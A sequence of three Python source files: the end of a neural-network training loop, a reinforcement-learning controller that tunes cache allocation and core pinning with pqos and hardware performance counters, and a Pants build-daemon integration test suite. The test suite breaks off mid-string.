validation_tasks = init_parallel_jobs([validation_db], validation_queue, sample_data, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
print("building model...")
nnet = NetworkFactory(training_dbs[0])
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = nnet.train(**training)
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
del training_loss
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
nnet.train_mode()
if iteration % snapshot == 0:
nnet.save_params(iteration)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
for validation_task in validation_tasks:
validation_task.terminate()
if __name__ == "__main__":
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter)
|
controller_img_dnn.py
|
#!/usr/bin/env python3
from datetime import datetime
from pathlib import Path
import subprocess
import gym
import os
from silence_tensorflow import silence_tensorflow
silence_tensorflow()
from stable_baselines import DQN
from stable_baselines import PPO2
import threading
import time
import configparser
import loggers
import tensorflow as tf
import numpy as np
import perfmon
import struct
import random
import psutil
from collections import deque
from itertools import zip_longest
import logging
import os
# logging.disable(logging.WARNING)
# os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
config = configparser.ConfigParser()
config.read('config.ini')
containerReward = {
'reward': [],
'lock': threading.Lock()
}
window_size = 5
deques = {
'UNHALTED_CORE_CYCLES': deque([], maxlen=window_size),
'INSTRUCTION_RETIRED': deque([], maxlen=window_size),
'PERF_COUNT_HW_CPU_CYCLES': deque([], maxlen=window_size),
'UNHALTED_REFERENCE_CYCLES': deque([], maxlen=window_size),
'UOPS_RETIRED': deque([], maxlen=window_size),
'BRANCH_INSTRUCTIONS_RETIRED': deque([], maxlen=window_size),
'MISPREDICTED_BRANCH_RETIRED': deque([], maxlen=window_size),
'PERF_COUNT_HW_BRANCH_MISSES': deque([], maxlen=window_size),
'LLC_MISSES': deque([], maxlen=window_size),
'PERF_COUNT_HW_CACHE_L1D': deque([], maxlen=window_size),
'PERF_COUNT_HW_CACHE_L1I': deque([], maxlen=window_size),
}
rewardLogger, wayLogger, sjrnLogger, stateLogger, coreLogger, rpsLogger, coreMapLogger = loggers.setupDataLoggers()
EVENTS = ['UNHALTED_CORE_CYCLES', 'INSTRUCTION_RETIRED', 'PERF_COUNT_HW_CPU_CYCLES', 'UNHALTED_REFERENCE_CYCLES', \
'UOPS_RETIRED', 'BRANCH_INSTRUCTIONS_RETIRED', 'MISPREDICTED_BRANCH_RETIRED', \
'PERF_COUNT_HW_BRANCH_MISSES', 'LLC_MISSES', 'PERF_COUNT_HW_CACHE_L1D', \
'PERF_COUNT_HW_CACHE_L1I']
# EVENT_MAX = [1009566688, 2200098315, 1413332030, 4404609, 390883292,
# 18043023, 1413719982, 18032364, 20587451, 41154, 7496985285]
EVENT_MAX = [1251666326, 2697635738, 1502160478, 1385062673, 3899393008, 265396012, 42954597, 42960949, 1598918, 14667253, 30645]
EVENT_MAX = [e*2 for e in EVENT_MAX]
class CustomEnv(gym.Env):
def __init__(self):
super(CustomEnv, self).__init__()
global deques, window_size
self.deques = deques
self.window_size = window_size
self.startingTime = round(time.time())
threading.Thread(target=loggers.containerLogger, args=(containerReward, rpsLogger, self.startingTime,), daemon=True).start()
time.sleep(3)
self.pid = 0
for proc in psutil.process_iter():
if 'img-dnn_integra' in proc.name():
self.pid = proc.pid
print(self.pid)
if self.pid == 0 :
print("Couldn't find app pid, exiting...")
exit(-1)
self.tid = list()
for tid in psutil.Process(self.pid).threads():
self.tid.append(tid.id)
self.action_space = gym.spaces.Discrete(5)
self.observation_space = gym.spaces.Box(low=0, high=1.5, shape=(13,), dtype=np.float64)
os.system('pqos -R > /dev/null')
os.system('pqos -e "llc:0=0x30000;" > /dev/null')
self.appCacheWays = 20
self.updateWays()
self.cores = [core for core in range(12, 24)]
self.cores += [core for core in range(36, 48)]
self.allCores = [core for core in range(12, 24)]
self.allCores += [core for core in range(36, 48)]
self.initialMapping()
cores = str(self.cores)[1:-1].replace(' ', '')
os.system('pqos -a "llc:1=%s;"' % cores)
self.startPerfmon()
self.previousTime = 0
def initialMapping(self):
for pid, core in zip(self.tid, self.allCores):
p = psutil.Process(pid=pid)
p.cpu_affinity([core])
def mapCores(self,action):
# action is +-1
if action == 1:
unusedCores = [core for core in self.allCores if core not in self.cores]
newCore = unusedCores[0]
self.cores.append(newCore)
cores = str(self.cores)[1:-1].replace(' ', '')
os.system('pqos -a "llc:1=%s;"' % cores)
elif action == -1:
core = self.cores.pop()
cores = str(self.cores)[1:-1].replace(' ', '')
os.system('pqos -a "llc:0=%s;" > /dev/null' % cores)
coreMapLogger.warn(str(self.cores))
thread_index = 0
for core in self.cores:
pid = self.tid[thread_index]
thread_index += 1
p = psutil.Process(pid=pid)
p.cpu_affinity([core])
cores_reversed = self.cores[::-1]
for i in range(thread_index,len(self.tid)):
core = self.cores[ ( i - thread_index ) % len(cores_reversed) ]
pid = self.tid[i]
p = psutil.Process(pid=pid)
p.cpu_affinity([core])
def startPerfmon(self):
self.sessions = [None] * len(self.tid)
for i,id in enumerate(self.tid):
self.sessions[i] = perfmon.PerThreadSession(int(id), EVENTS)
self.sessions[i].start()
def getPMC(self):
pmc = [0] * len(EVENTS)
for i in range(0,len(EVENTS)):
for session in self.sessions:
count = struct.unpack("L", session.read(i))[0]
pmc[i] += float(count)
pmc[i] /= len(self.tid)
return pmc
def formatForCAT(self, ways):
res = 1 << ways - 1
res = res + res - 1
return hex(res)
def updateWays(self):
os.system('sudo pqos -e "llc:1=%s;" > /dev/null' % self.formatForCAT(self.appCacheWays))
def takeAction(self, action):
if(action == 0):
if(self.appCacheWays < 20):
self.appCacheWays += 1
wayLogger.warn("Increasing ways to - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
self.updateWays()
else:
wayLogger.warn("Ignore - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
return -1
elif(action == 1):
if(self.appCacheWays > 3):
self.appCacheWays -= 1
wayLogger.warn("Decreasing ways to - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
self.updateWays()
else:
wayLogger.warn("Ignore - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
return -1
elif(action == 2):
if(len(self.cores) < 24):
coreLogger.warn("Increasing cores to - %s %s" % (len(self.cores) + 1, round(time.time()) - self.startingTime))
self.mapCores(1)
else:
coreLogger.warn("Ignore - %s %s" % (len(self.cores), round(time.time()) - self.startingTime))
return -1
elif(action == 3):
if(len(self.cores) > 3):
coreLogger.warn("Decreasing cores to - %s %s" % (len(self.cores) - 1, round(time.time()) - self.startingTime))
self.mapCores(-1)
else:
coreLogger.warn("Ignore - %s %s" % (len(self.cores), round(time.time()) - self.startingTime))
return -1
else:
wayLogger.warn("Maintaining - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
coreLogger.warn("Maintaining - %s %s" % (len(self.cores), round(time.time()) - self.startingTime))
return 0
def running_mean(self, x, N):
cumsum = np.cumsum(np.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N]) / float(N)
def norm_data(self, cur_counter=None):
state_space = []
run_mean = []
for i in range(0, len(EVENTS)):
out = cur_counter[i]/(EVENT_MAX[i])
state_space.append(out)
deques[EVENTS[i]].append(out)
if len(self.deques['UNHALTED_CORE_CYCLES']) < self.window_size:
return np.array(state_space)
else:
for _, val in self.deques.items():
run_mean.append(self.running_mean(val, self.window_size)[0])
return np.array(run_mean)
def getState(self, before, after):
state = [0] * len(EVENTS)
for i in range(0,len(EVENTS)):
state[i] = after[i] - before[i]
normalized = self.norm_data(state)
stateLogger.info("State is : %s %s" % (list(normalized), round(time.time()) - self.startingTime))
normalized = np.append(normalized, [ len(self.cores)/24 , self.appCacheWays/20 ])
return list(normalized)
def getReward(self, ignoreAction = 0):
global containerReward
while(len(containerReward['reward']) == 0):
time.sleep(0.01)
rewardLogger.info("Waiting on reward " +
str(round(time.time()) - self.startingTime))
containerReward['lock'].acquire()
sjrn99 = np.percentile(containerReward['reward'], 99)
qos = round(sjrn99/1e3)
containerReward['lock'].release()
sjrnLogger.info("99th percentile is : " + str(qos) + " " + str(round(time.time()) - self.startingTime))
qosTarget = 4000
if qos > qosTarget:
reward = max(-(qos/qosTarget)**3, -50)
else:
# reward = qos/qosTarget + (20/self.appCacheWays + 24/len(self.cores))*2
# reward = qosTarget/qos + (20/self.appCacheWays + 24/len(self.cores))*2
reward = qosTarget/qos + (20/self.appCacheWays) + (24/len(self.cores))
if ignoreAction != 0:
reward = -10
rewardLogger.info("Reward is : " + str(reward) + " " + str(round(time.time()) - self.startingTime))
return reward
def clearReward(self):
global containerReward
containerReward['lock'].acquire()
containerReward['reward'] = []
containerReward['lock'].release()
def step(self, action):
pmc_before = self.getPMC()
ignored_action = self.takeAction(action)
self.clearReward()
time.sleep(2)
pmc_after = self.getPMC()
state = self.getState(pmc_before, pmc_after)
reward = self.getReward(ignored_action)
return state, reward, 0, {}
def reset(self):
state = [0] * (len(EVENTS) + 2)
return state
def close(self):
return
if __name__ == "__main__":
dt = datetime.now().strftime("%m_%d_%H")
Path("./models/%s" % dt).mkdir(parents=True, exist_ok=True)
env = CustomEnv()
policy_kwargs = dict(act_fun=tf.nn.relu, layers=[512, 256, 128])
model = DQN("MlpPolicy", env, policy_kwargs=policy_kwargs, verbose=1,
train_freq=1,
prioritized_replay=True,
prioritized_replay_alpha=0.6, prioritized_replay_beta0=0.4, prioritized_replay_beta_iters=20000,
double_q=True,
learning_rate=0.0025, target_network_update_freq=150, learning_starts=750,
batch_size=64, buffer_size=1000000,
gamma=0.99, exploration_fraction=0.1, exploration_initial_eps=1, exploration_final_eps=0.01,
tensorboard_log="./logs/%s/" % dt, n_cpu_tf_sess=22
)
model.learn(total_timesteps=15000)
model.save("./models/%s/model.zip" % dt)
|
test_pantsd_integration.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import datetime
import itertools
import os
import re
import signal
import sys
import threading
import time
import unittest
from textwrap import dedent
from pants.util.contextutil import environment_as, temporary_dir, temporary_file
from pants.util.dirutil import rm_rf, safe_file_dump, safe_mkdir, safe_open, touch
from pants_test.pants_run_integration_test import read_pantsd_log
from pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase
from pants_test.testutils.process_test_util import no_lingering_process_by_command
def launch_file_toucher(f):
"""Launch a loop to touch the given file, and return a function to call to stop and join it."""
if not os.path.isfile(f):
raise AssertionError('Refusing to touch a non-file.')
halt = threading.Event()
def file_toucher():
while not halt.isSet():
touch(f)
time.sleep(1)
thread = threading.Thread(target=file_toucher)
thread.daemon = True
thread.start()
def join():
halt.set()
thread.join(timeout=10)
return join
class TestPantsDaemonIntegration(PantsDaemonIntegrationTestBase):
def test_pantsd_compile(self):
with self.pantsd_successful_run_context('debug') as (pantsd_run, checker, _, _):
# This tests a deeper pantsd-based run by actually invoking a full compile.
pantsd_run(['compile', 'examples/src/scala/org/pantsbuild/example/hello/welcome'])
checker.assert_started()
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7573')
def test_pantsd_run(self):
extra_config = {
'GLOBAL': {
# Muddies the logs with warnings: once all of the warnings in the repository
# are fixed, this can be removed.
'glob_expansion_failure': 'ignore',
}
}
with self.pantsd_successful_run_context(
'debug',
extra_config=extra_config
) as (pantsd_run, checker, workdir, _):
pantsd_run(['list', '3rdparty:'])
checker.assert_started()
pantsd_run(['list', ':'])
checker.assert_running()
pantsd_run(['list', '::'])
checker.assert_running()
# And again using the cached BuildGraph.
pantsd_run(['list', '::'])
checker.assert_running()
# Assert there were no warnings or errors thrown in the pantsd log.
full_log = '\n'.join(read_pantsd_log(workdir))
for line in read_pantsd_log(workdir):
# Ignore deprecation warning emissions.
if 'DeprecationWarning' in line:
continue
# Check if the line begins with W or E to check if it is a warning or error line.
self.assertNotRegex(line, r'^[WE].*',
'error message detected in log:\n{}'.format(full_log))
def test_pantsd_broken_pipe(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
run = self.run_pants_with_workdir('help | head -1', workdir, pantsd_config, shell=True)
self.assertNotIn('broken pipe', run.stderr_data.lower())
checker.assert_started()
def test_pantsd_stacktrace_dump(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
pantsd_run(['-ldebug', 'help'])
checker.assert_started()
os.kill(checker.pid, signal.SIGUSR2)
# Wait for log flush.
time.sleep(2)
self.assertIn('Current thread 0x', '\n'.join(read_pantsd_log(workdir)))
def test_pantsd_pantsd_runner_doesnt_die_after_failed_run(self):
# Check for no stray pantsd prcesses.
with no_lingering_process_by_command('pantsd'):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
# Run target that throws an exception in pants.
self.assert_failure(
self.run_pants_with_workdir(
['bundle', 'testprojects/src/java/org/pantsbuild/testproject/bundle:missing-files'],
workdir,
pantsd_config)
)
checker.assert_started()
# Assert pantsd is in a good functional state.
self.assert_success(self.run_pants_with_workdir(['help'], workdir, pantsd_config))
checker.assert_running()
def test_pantsd_lifecycle_invalidation(self):
"""Runs pants commands with pantsd enabled, in a loop, alternating between options that
should invalidate pantsd and incur a restart and then asserts for pid consistency.
"""
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = (
['debug', 'help'],
['info', 'help']
)
last_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 3)):
# Run with a CLI flag.
pantsd_run(['-l{}'.format(cmd[0]), cmd[1]])
next_pid = checker.assert_started()
if last_pid is not None:
self.assertNotEqual(last_pid, next_pid)
last_pid = next_pid
# Run with an env var.
pantsd_run(cmd[1:], {'GLOBAL': {'level': cmd[0]}})
checker.assert_running()
def test_pantsd_lifecycle_non_invalidation(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = (
['-q', 'help'],
['--no-colors', 'help'],
['help']
)
last_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 3)):
# Run with a CLI flag.
pantsd_run(cmd)
next_pid = checker.assert_started()
if last_pid is not None:
self.assertEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_non_invalidation_on_config_string(self):
with temporary_dir() as dist_dir_root, temporary_dir() as config_dir:
config_files = [
os.path.abspath(os.path.join(config_dir, 'pants.ini.{}'.format(i))) for i in range(2)
]
for config_file in config_files:
print('writing {}'.format(config_file))
with open(config_file, 'w') as fh:
fh.write('[GLOBAL]\npants_distdir: {}\n'.format(os.path.join(dist_dir_root, 'v1')))
invalidating_config = os.path.join(config_dir, 'pants.ini.invalidates')
with open(invalidating_config, 'w') as fh:
fh.write('[GLOBAL]\npants_distdir: {}\n'.format(os.path.join(dist_dir_root, 'v2')))
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = [['--pants-config-files={}'.format(f), 'help'] for f in config_files]
pantsd_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 2)):
pantsd_run(cmd)
if not pantsd_pid:
pantsd_pid = checker.assert_started()
else:
checker.assert_running()
pantsd_run(['--pants-config-files={}'.format(invalidating_config), 'help'])
self.assertNotEqual(pantsd_pid, checker.assert_started())
def test_pantsd_stray_runners(self):
# Allow env var overrides for local stress testing.
attempts = int(os.environ.get('PANTS_TEST_PANTSD_STRESS_ATTEMPTS', 20))
cmd = os.environ.get('PANTS_TEST_PANTSD_STRESS_CMD', 'help').split()
with no_lingering_process_by_command('pantsd'):
with self.pantsd_successful_run_context('debug') as (pantsd_run, checker, _, _):
pantsd_run(cmd)
checker.assert_started()
for _ in range(attempts):
pantsd_run(cmd)
checker.assert_running()
# The runner can sometimes exit more slowly than the thin client caller.
time.sleep(3)
def test_pantsd_aligned_output(self):
# Set for pytest output display.
self.maxDiff = None
cmds = [
['goals'],
['help'],
['targets'],
['roots']
]
non_daemon_runs = [self.run_pants(cmd) for cmd in cmds]
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
daemon_runs = [pantsd_run(cmd) for cmd in cmds]
checker.assert_started()
for cmd, run in zip(cmds, daemon_runs):
print("(cmd, run) = ({}, {}, {})".format(cmd, run.stdout_data, run.stderr_data))
self.assertNotEqual(run.stdout_data, '', 'Empty stdout for {}'.format(cmd))
for run_pairs in zip(non_daemon_runs, daemon_runs):
self.assertEqual(*(run.stdout_data for run in run_pairs))
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7622')
def test_pantsd_filesystem_invalidation(self):
"""Runs with pantsd enabled, in a loop, while another thread invalidates files."""
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
cmd = ['list', '::']
pantsd_run(cmd)
checker.assert_started()
# Launch a separate thread to poke files in 3rdparty.
join = launch_file_toucher('3rdparty/jvm/com/google/auto/value/BUILD')
# Repeatedly re-list 3rdparty while the file is being invalidated.
for _ in range(0, 16):
pantsd_run(cmd)
checker.assert_running()
join()
def test_pantsd_client_env_var_is_inherited_by_pantsd_runner_children(self):
EXPECTED_KEY = 'TEST_ENV_VAR_FOR_PANTSD_INTEGRATION_TEST'
EXPECTED_VALUE = '333'
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
# First, launch the daemon without any local env vars set.
pantsd_run(['help'])
checker.assert_started()
# Then, set an env var on the secondary call.
# We additionally set the `HERMETIC_ENV` env var to allow the integration test harness
# to pass this variable through.
env = {
EXPECTED_KEY: EXPECTED_VALUE,
'HERMETIC_ENV': EXPECTED_KEY,
}
with environment_as(**env):
result = pantsd_run(
['-q',
'run',
'testprojects/src/python/print_env',
'--',
EXPECTED_KEY]
)
checker.assert_running()
self.assertEqual(EXPECTED_VALUE, ''.join(result.stdout_data).strip())
def test_pantsd_launch_env_var_is_not_inherited_by_pantsd_runner_children(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
with environment_as(NO_LEAKS='33'):
self.assert_success(
self.run_pants_with_workdir(
['help'],
workdir,
pantsd_config)
)
checker.assert_started()
self.assert_failure(
self.run_pants_with_workdir(
['-q', 'run', 'testprojects/src/python/print_env', '--', 'NO_LEAKS'],
workdir,
pantsd_config
)
)
checker.assert_running()
def test_pantsd_touching_a_file_does_not_restart_daemon(self):
test_file = 'testprojects/src/python/print_env/main.py'
config = {'GLOBAL': {'pantsd_invalidation_globs': '["testprojects/src/python/print_env/*"]'}}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run, checker, workdir, _
):
pantsd_run(['help'])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
touch(test_file)
# Permit ample time for the async file event propagate in CI.
time.sleep(10)
checker.assert_running()
def test_pantsd_invalidation_file_tracking(self):
test_dir = 'testprojects/src/python/print_env'
config = {'GLOBAL': {'pantsd_invalidation_globs': '["%s/*"]' %(test_dir)}}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run, checker, workdir, _
):
pantsd_run(['help'])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
def full_pantsd_log():
return '\n'.join(read_pantsd_log(workdir))
# Check the logs.
self.assertRegex(full_pantsd_log(), r'watching invalidating files:.*{}'.format(test_dir))
checker.assert_running()
# Create a new file in test_dir
with temporary_file(suffix='.py', binary_mode=False, root_dir=test_dir) as temp_f:
temp_f.write("import that\n")
temp_f.close()
time.sleep(10)
checker.assert_stopped()
self.assertIn('saw file events covered by invalidation globs', full_pantsd_log())
def test_pantsd_invalidation_pants_ini_file(self):
# Test tmp_pants_ini (--pants-config-files=$tmp_pants_ini)'s removal
tmp_pants_ini = os.path.abspath("testprojects/test_pants.ini")
# Create tmp_pants_ini file
with safe_open(tmp_pants_ini, 'w') as f:
f.write("[DEFAULT]\n")
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
pantsd_run(['--pants-config-files={}'.format(tmp_pants_ini), 'help'])
checker.assert_started()
time.sleep(5)
# Delete tmp_pants_ini
os.unlink(tmp_pants_ini)
time.sleep(10)
checker.assert_stopped()
def test_pantsd_pid_deleted(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
pantsd_run(['help'])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
os.unlink(os.path.join(config["GLOBAL"]["pants_subprocessdir"], "pantsd", "pid"))
# Permit ample time for the async file event propagate in CI.
time.sleep(10)
checker.assert_stopped()
def test_pantsd_pid_change(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
pantsd_run(['help'])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
pidpath = os.path.join(config["GLOBAL"]["pants_subprocessdir"], "pantsd", "pid")
with open(pidpath, 'w') as f:
f.write('9')
# Permit ample time for the async file event propagate in CI.
time.sleep(10)
checker.assert_stopped()
# Remove the pidfile so that the teardown script doesn't try to kill process 9.
os.unlink(pidpath)
@unittest.skipIf(sys.version_info[0] == 2,
reason='Increases by ~0.52 under python 2 as described in '
'https://github.com/pantsbuild/pants/issues/7761.')
def test_pantsd_memory_usage(self):
"""Validates that after N runs, memory usage has increased by no more than X percent."""
number_of_runs = 10
max_memory_increase_fraction = 0.40 # TODO https://github.com/pantsbuild/pants/issues/7647
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
cmd = ['filter', 'testprojects::']
self.assert_success(pantsd_run(cmd))
initial_memory_usage = checker.current_memory_usage()
for _ in range(number_of_runs):
self.assert_success(pantsd_run(cmd))
checker.assert_running()
final_memory_usage = checker.current_memory_usage()
self.assertTrue(
initial_memory_usage <= final_memory_usage,
"Memory usage inverted unexpectedly: {} > {}".format(
initial_memory_usage, final_memory_usage
)
)
increase_fraction = (float(final_memory_usage) / initial_memory_usage) - 1.0
self.assertTrue(
increase_fraction <= max_memory_increase_fraction,
"Memory usage increased more than expected: {} -> {}: {} actual increase (expected < {})".format(
initial_memory_usage, final_memory_usage, increase_fraction, max_memory_increase_fraction
)
)
def test_pantsd_invalidation_stale_sources(self):
test_path = 'tests/python/pants_test/daemon_correctness_test_0001'
test_build_file = os.path.join(test_path, 'BUILD')
test_src_file = os.path.join(test_path, 'some_file.py')
has_source_root_regex = r'"source_root": ".*/{}"'.format(test_path)
export_cmd = ['export', test_path]
try:
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
safe_mkdir(test_path, clean=True)
pantsd_run(['help'])
checker.assert_started()
safe_file_dump(test_build_file, "python_library(sources=globs('some_non_existent_file.py'))")
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertNotRegex(result.stdout_data, has_source_root_regex)
safe_file_dump(test_build_file, "python_library(sources=globs('*.py'))")
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertNotRegex(result.stdout_data, has_source_root_regex)
safe_file_dump(test_src_file, 'import this\n')
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertRegex(result.stdout_data, has_source_root_regex)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_parse_exception_success(self):
# This test covers the case described in #6426, where a run that is failing fast due to an
# exception can race other completing work. We expect all runs to fail due to the error
# that has been introduced, but none of them should hang.
test_path = 'testprojects/3rdparty/this_is_definitely_not_a_valid_directory'
test_build_file = os.path.join(test_path, 'BUILD')
invalid_symbol = 'this_is_definitely_not_a_valid_symbol'
try:
safe_mkdir(test_path, clean=True)
safe_file_dump(test_build_file, "{}()".format(invalid_symbol))
for _ in range(3):
with self.pantsd_run_context(success=False) as (pantsd_run, checker, _, _):
result = pantsd_run(['list', 'testprojects::'])
checker.assert_started()
self.assertIn(invalid_symbol, result.stderr_data)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_multiple_parallel_runs(self):
with self.pantsd_test_context() as (workdir, config, checker):
file_to_make = os.path.join(workdir, 'some_magic_file')
waiter_handle = self.run_pants_with_workdir_without_waiting(
['run', 'testprojects/src/python/coordinated_runs:waiter', '--', file_to_make],
workdir,
config,
)
checker.assert_started()
checker.assert_pantsd_runner_started(waiter_handle.process.pid)
creator_handle = self.run_pants_with_workdir_without_waiting(
['run', 'testprojects/src/python/coordinated_runs:creator', '--', file_to_make],
workdir,
config,
)
self.assert_success(creator_handle.join())
self.assert_success(waiter_handle.join())
def _assert_pantsd_keyboardinterrupt_signal(self, signum, regexps=[], quit_timeout=None):
"""Send a signal to the thin pailgun client and observe the error messaging.
:param int signum: The signal to send.
:param regexps: Assert that all of these regexps match somewhere in stderr.
:type regexps: list of str
:param float quit_timeout: The duration of time to wait for the pailgun client to flush all of
its output and die after being killed.
"""
# TODO: This tests that pantsd processes actually die after the thin client receives the
# specified signal.
with self.pantsd_test_context() as (workdir, config, checker):
# Launch a run that will wait for a file to be created (but do not create that file).
file_to_make = os.path.join(workdir, 'some_magic_file')
if quit_timeout is not None:
timeout_args = ['--pantsd-pailgun-quit-timeout={}'.format(quit_timeout)]
else:
timeout_args = []
argv = timeout_args + [
'run', 'testprojects/src/python/coordinated_runs:waiter', '--', file_to_make
]
waiter_handle = self.run_pants_with_workdir_without_waiting(argv, workdir, config)
client_pid = waiter_handle.process.pid
checker.assert_started()
checker.assert_pantsd_runner_started(client_pid)
# Get all the pantsd processes while they're still around.
pantsd_runner_processes = checker.runner_process_context.current_processes()
# This should kill the pantsd processes through the RemotePantsRunner signal handler.
os.kill(client_pid, signum)
waiter_run = waiter_handle.join()
self.assert_failure(waiter_run)
for regexp in regexps:
self.assertRegex(waiter_run.stderr_data, regexp)
time.sleep(1)
for proc in pantsd_runner_processes:
# TODO: we could be checking the return codes of the subprocesses, but psutil is currently
# limited on non-Windows hosts -- see https://psutil.readthedocs.io/en/latest/#processes.
# The pantsd processes should be dead, and they should have exited with 1.
self.assertFalse(proc.is_running())
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7554')
def test_pantsd_sigterm(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGTERM,
regexps=[
'\\[INFO\\] Sending SIGTERM to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.',
re.escape("\nSignal {signum} (SIGTERM) was raised. Exiting with failure.\n"
.format(signum=signal.SIGTERM)),
"""
Interrupted by user:
Interrupted by user over pailgun client!
$"""
])
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7572')
def test_pantsd_sigquit(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGQUIT,
regexps=[
'\\[INFO\\] Sending SIGQUIT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.',
re.escape("\nSignal {signum} (SIGQUIT) was raised. Exiting with failure.\n"
.format(signum=signal.SIGQUIT)),
"""
Interrupted by user:
Interrupted by user over pailgun client!
$"""])
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7547')
def test_pantsd_sigint(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=["""\
\\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.
Interrupted by user.
Interrupted by user:
Interrupted by user over pailgun client!
$"""])
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7457')
def test_signal_pailgun_stream_timeout(self):
# NB: The actual timestamp has the date and time at sub-second granularity. The date is just
# used here since that is known in advance in order to assert that the timestamp is well-formed.
today = datetime.date.today().isoformat()
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=["""\
\\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 0\\.01 seconds before sending SIGKILL\\.\\.\\.
Interrupted by user\\.
[^ ]* \\[WARN\\] timed out when attempting to gracefully shut down the remote client executing \
"'pantsd.*'"\\. sending SIGKILL to the remote client at pid: [0-9]+\\. message: iterating \
